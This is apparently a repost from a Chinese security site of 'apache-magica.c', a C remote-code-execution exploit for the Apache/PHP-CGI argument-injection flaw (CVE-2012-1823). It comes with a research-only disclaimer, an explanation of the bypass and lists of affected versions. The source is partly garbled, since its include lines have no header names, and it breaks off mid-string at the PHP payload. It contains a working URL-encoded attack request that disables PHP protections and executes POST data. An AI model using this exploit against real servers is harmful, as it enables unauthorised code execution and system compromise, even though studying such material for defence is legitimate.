Apache / PHP 5.x Remote Code Execution Exploit

lidonghe

测试方法:
　　本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

• /* Apache Magica by Kingcope */
  
• /* gcc apache-magika.c -o apache-magika -lssl */
  
• /* This is a code execution bug in the combination of Apache and PHP.
  
• On Debian and Ubuntu the vulnerability is present in the default install
  
• of the php5-cgi package. When the php5-cgi package is installed on Debian and
  
• Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
  
• /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
  
• the binary because this binary has a security check enabled when installed with
  
• Apache http server and this security check is circumvented by the exploit.
  
• When accessing the php-cgi binary the security check will block the request and
  
• will not execute the binary.
  
• In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
  
• check is done when the php.ini configuration setting cgi.force_redirect is set
  
• and the php.ini configuration setting cgi.redirect_status_env is set to no.
  
• This makes it possible to execute the binary bypassing the Security check by
  
• setting these two php.ini settings.
  
• Prior to this code for the Security check getopt is called and it is possible
  
• to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
  
• -d switch. If both values are set to zero and the request is sent to the server
  
• php-cgi gets fully executed and we can use the payload in the POST data field
  
• to execute arbitrary php and therefore we can execute programs on the system.
  
• apache-magika.c is an exploit that does exactly the prior described. It does
  
• support SSL.
  
• /* Affected and tested versions
  
• PHP 5.3.10
  
• PHP 5.3.8-1
  
• PHP 5.3.6-13
  
• PHP 5.3.3
  
• PHP 5.2.17
  
• PHP 5.2.11
  
• PHP 5.2.6-3
  
• PHP 5.2.6+lenny16 with Suhosin-Patch
  
• Affected versions
  
• PHP prior to 5.3.12
  
• PHP prior to 5.4.2
  
• Unaffected versions
  
• PHP 4 - getopt parser unexploitable
  
• PHP 5.3.12 and up
  
• PHP 5.4.2 and up
  
• Unaffected versions are patched by CVE-2012-1823.
  
• */
  
• /* .
  
• /'\rrq rk
  
• . // \\ .
  
• .x.//fco\\-|-
  
• '//cmtco\\zt
  
• //6meqrg.\\tq
  
• //_________\\'
  
• EJPGQO
  
• apache-magica.c by Kingcope
  
• */
  
• 
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• #include
  
• 
  
• typedefstruct{
  
• int sockfd;
  
• SSL *handle;
  
• SSL_CTX *ctx;
  
• } connection;
  
• 
  
• void usage(char*argv[])
  
• {
  
• printf("usage: %s    " \
  
• "  [--force-interpreter interpreter]\n",
  
• argv[0]);
  
• exit(1);
  
• }
  
• 
  
• char poststr[]="POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F" \
  
• "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64" \
  
• "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73" \
  
• "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E" \
  
• "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63" \
  
• "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62" \
  
• "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74" \
  
• "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68" \
  
• "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F" \
  
• "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63" \
  
• "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73" \
  
• "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n" \
  
• "Host: %s\r\n" \
  
• "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26" \
  
• "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n" \
  
• "Content-Type: application/x-www-form-urlencoded\r\n" \
  
• "Content-Length: %d\r\n" \
  
• "Connection: close\r\n\r\n%s";
  
• char phpstr[]="